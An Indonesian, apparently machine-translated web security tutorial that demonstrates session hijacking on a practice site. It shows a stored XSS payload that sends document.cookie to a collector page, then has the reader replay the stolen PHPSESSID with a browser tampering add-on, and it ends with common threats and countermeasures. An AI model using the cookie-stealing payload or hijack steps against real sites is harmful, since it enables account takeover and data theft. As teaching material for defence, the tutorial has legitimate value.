Bagaimana Cara Meretas Situs Web? Teknik Peretasan Situs Umum
Teknik Peretasan Situs Web
Lebih banyak orang memiliki akses ke internet dibandingkan sebelumnya. Hal ini mendorong banyak organisasi untuk mengembangkan aplikasi berbasis web yang dapat digunakan pengguna secara online untuk berinteraksi dengan organisasi. Kode aplikasi web yang ditulis dengan buruk dapat dieksploitasi untuk mendapatkan akses tidak sah ke data sensitif dan server web.
Dalam tutorial ini Anda akan mempelajari cara meretas situs web, dan kami akan memperkenalkannya kepada Anda teknik peretasan aplikasi web dan tindakan balasannya Anda dapat menempatkannya di tempat untuk melindungi diri dari serangan semacam itu.
Cara Meretas Situs Web
Dalam skenario praktis peretasan situs web ini, kita akan membajak sesi pengguna aplikasi web yang berlokasi di www.techpanda.org. Kami akan menggunakan skrip lintas situs untuk membaca id sesi cookie kemudian menggunakannya untuk meniru sesi pengguna yang sah.
Asumsi yang dibuat adalah penyerang mempunyai akses ke aplikasi web dan dia ingin membajak sesi pengguna lain yang menggunakan aplikasi yang sama. Tujuan dari serangan ini adalah untuk mendapatkan akses admin ke aplikasi web dengan asumsi akun akses penyerang terbatas.
Langkah 1) Buka URL http://www.techpanda.org/.
Untuk keperluan praktik, sangat disarankan untuk mendapatkan akses menggunakan SQL Injection. Lihat ini artikel untuk informasi lebih lanjut tentang cara melakukannya.
Langkah 2) Masukkan Rincian Login.
Email loginnya adalah admin@google.com, kata sandinya adalah Kata Sandi2010.
Langkah 3) Periksa dasbor.
Jika Anda berhasil login, maka Anda akan mendapatkan dashboard berikut
Langkah 4) Masukkan Konten Baru.
Klik Tambahkan Kontak Baru dan Masukkan yang berikut sebagai nama depan
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
Langkah 5) Add Javascript.
Kode di atas menggunakan JavaNaskah. Itu menambahkan hyperlink dengan acara onclick. Saat pengguna yang tidak menaruh curiga mengeklik tautan tersebut, peristiwa tersebut akan mengambil kembali tautan tersebut PHP ID sesi cookie dan mengirimkannya ke snatch_sess_id.php
halaman bersama dengan id sesi di URL
Langkah 6) Tambahkan Rincian.
Masukkan rincian yang tersisa seperti yang ditunjukkan di bawah ini dan Klik Simpan Perubahan
Langkah 7) Periksa dasbor.
Dasbor Anda sekarang akan terlihat seperti layar berikut
Langkah 8) Periksa id sesi.
Note: skrip mungkin mengirimkan nilai ke beberapa server jauh tempat PHPSESSID disimpan kemudian pengguna diarahkan kembali ke situs web seolah-olah tidak terjadi apa-apa.
Note: nilai yang Anda dapatkan mungkin berbeda dengan yang ada di halaman web ini tutorial peretasan, tapi konsepnya sama
Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data
Diagram alur di bawah ini menunjukkan langkah-langkah yang harus Anda ambil untuk menyelesaikan latihan ini.
- Anda akan perlu Firefox browser web untuk bagian ini dan add-on Tamper Data
- Open Firefox dan instal add seperti yang ditunjukkan pada diagram di bawah ini
- Cari data tamper lalu klik install seperti gambar di atas
- Klik Terima dan Instal…
- Klik Restart sekarang ketika instalasi selesai
- Aktifkan bilah menu di Firefox jika tidak ditampilkan
- Klik pada menu tools lalu pilih Tamper Data seperti gambar di bawah ini
- Anda akan mendapatkan Jendela berikut. Catatan: Jika Windows tidak kosong, tekan tombol hapus
- Klik pada menu Mulai Tamper
- Beralih kembali ke Firefox peramban web, ketik http://www.techpanda.org/dashboard.php lalu tekan tombol enter untuk memuat halaman
- Anda akan mendapatkan pop up berikut dari Tamper Data
- Jendela pop-up memiliki tiga (3) opsi. Opsi Tamper memungkinkan Anda mengubah informasi header HTTP sebelum dikirimkan ke server.
- Klik di atasnya
- Anda akan mendapatkan jendela berikut
- Salin ID sesi PHP Anda menyalin dari URL serangan dan menempelkannya setelah tanda sama dengan. Nilai Anda sekarang akan terlihat seperti ini
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Klik tombol OK
- Anda akan mendapatkan jendela popup data Tamper lagi
- Hapus tanda centang pada kotak yang menanyakan Lanjutkan Perusakan?
- Klik tombol kirim setelah selesai
- Anda seharusnya dapat melihat dashboard seperti yang ditunjukkan di bawah ini
Note: kami tidak login, kami meniru sesi login menggunakan nilai PHPSESSID yang kami ambil menggunakan skrip lintas situs
Apa itu Aplikasi Web? Apa itu Ancaman Web?
Aplikasi web (alias situs web) adalah aplikasi yang didasarkan pada model klien-server. Itu Server menyediakan akses database dan logika bisnis. Itu dihosting di server web. Aplikasi klien berjalan di browser web klien. Aplikasi web biasanya ditulis dalam bahasa seperti Java, C#, dan VB.Net, PHP, ColdFusion Markup Language, dll. mesin database yang digunakan dalam aplikasi web meliputi MySQL, MSSQL Server, PostgreSQL, SQLite, Dll
Teknik Peretasan Situs Web Teratas
Sebagian besar aplikasi web dihosting di server publik yang dapat diakses melalui Internet. Hal ini membuat aplikasi tersebut rentan terhadap serangan karena aksesnya yang mudah. Berikut ini adalah beberapa ancaman umum pada aplikasi web.
- SQL Injection – tujuan dari ancaman ini bisa jadi untuk menerobos algoritma login, menyabotase data, dan lain sebagainya.
- Penolakan serangan layanan– tujuan dari ancaman ini adalah untuk menolak akses pengguna yang sah terhadap sumber daya
- XSS Skrip Lintas Situs– Tujuan dari ancaman ini mungkin untuk memasukkan kode yang dapat dieksekusi pada browser sisi klien.
- Keracunan Cookie/Sesi– tujuan ancaman ini adalah untuk mengubah cookie/data sesi oleh penyerang untuk mendapatkan akses tidak sah.
- Perusakan Formulir – tujuan dari ancaman ini adalah untuk mengubah bentuk data seperti harga di aplikasi e-commerce sehingga penyerang bisa mendapatkan barang dengan harga lebih murah.
- Injeksi Kode – tujuan dari ancaman ini adalah untuk memasukkan kode seperti PHP, Python, dll. yang dapat dieksekusi di server. Kode tersebut dapat menginstal pintu belakang, mengungkapkan informasi sensitif, dll.
- Perusakan– tujuan dari ancaman ini adalah untuk mengubah halaman yang ditampilkan pada situs web dan mengalihkan semua permintaan halaman ke satu halaman yang berisi pesan penyerang.
Bagaimana Melindungi Situs Web Anda dari Peretasan?
Suatu organisasi dapat mengadopsi kebijakan berikut untuk melindungi dirinya dari serangan server web.
- SQL Injection – membersihkan dan memvalidasi parameter pengguna sebelum mengirimkannya ke database untuk diproses dapat membantu mengurangi kemungkinan diserang melalui SQL Injection. Mesin basis data seperti MS SQL Server, MySQL, dll. parameter dukungan, dan pernyataan yang disiapkan. Pernyataan ini jauh lebih aman dibandingkan pernyataan SQL tradisional
- Penolakan serangan layanan - firewall dapat digunakan untuk menghentikan lalu lintas dari alamat IP yang mencurigakan jika serangannya berupa DoS sederhana. Konfigurasi jaringan dan Sistem Deteksi Intrusi yang tepat juga dapat membantu mengurangi kemungkinan a serangan DoS telah sukses.
- Skrip Lintas Situs – memvalidasi dan membersihkan header, parameter yang diteruskan melalui URL, parameter formulir, dan nilai tersembunyi dapat membantu mengurangi serangan XSS.
- Keracunan Cookie/Sesi – hal ini dapat dicegah dengan mengenkripsi konten cookie, mengatur waktu cookie setelah beberapa waktu, mengaitkan cookie dengan alamat IP klien yang digunakan untuk membuatnya.
- Bentuk temper – hal ini dapat dicegah dengan memvalidasi dan memverifikasi input pengguna sebelum memprosesnya.
- Injeksi Kode – hal ini dapat dicegah dengan memperlakukan semua parameter sebagai data, bukan kode yang dapat dieksekusi. Sanitasi dan Validasi dapat digunakan untuk menerapkan hal ini.
- Perusakan – kebijakan keamanan pengembangan aplikasi web yang baik harus memastikan bahwa kebijakan tersebut menyegel kerentanan yang umum digunakan untuk mengakses server webIni dapat berupa konfigurasi yang tepat dari sistem operasi, perangkat lunak server web, dan praktik keamanan terbaik saat mengembangkan aplikasi web.
Kesimpulan
- Aplikasi web didasarkan pada model server-klien. Sisi klien menggunakan browser web untuk mengakses sumber daya di server.
- Aplikasi web biasanya dapat diakses melalui internet. Hal ini membuat mereka rentan terhadap serangan.
- Ancaman aplikasi web termasuk Injeksi SQL, Injeksi Kode, XSS, Defacement, keracunan Cookie, dll.
- Kebijakan keamanan yang baik ketika mengembangkan aplikasi web dapat membantu mengamankannya.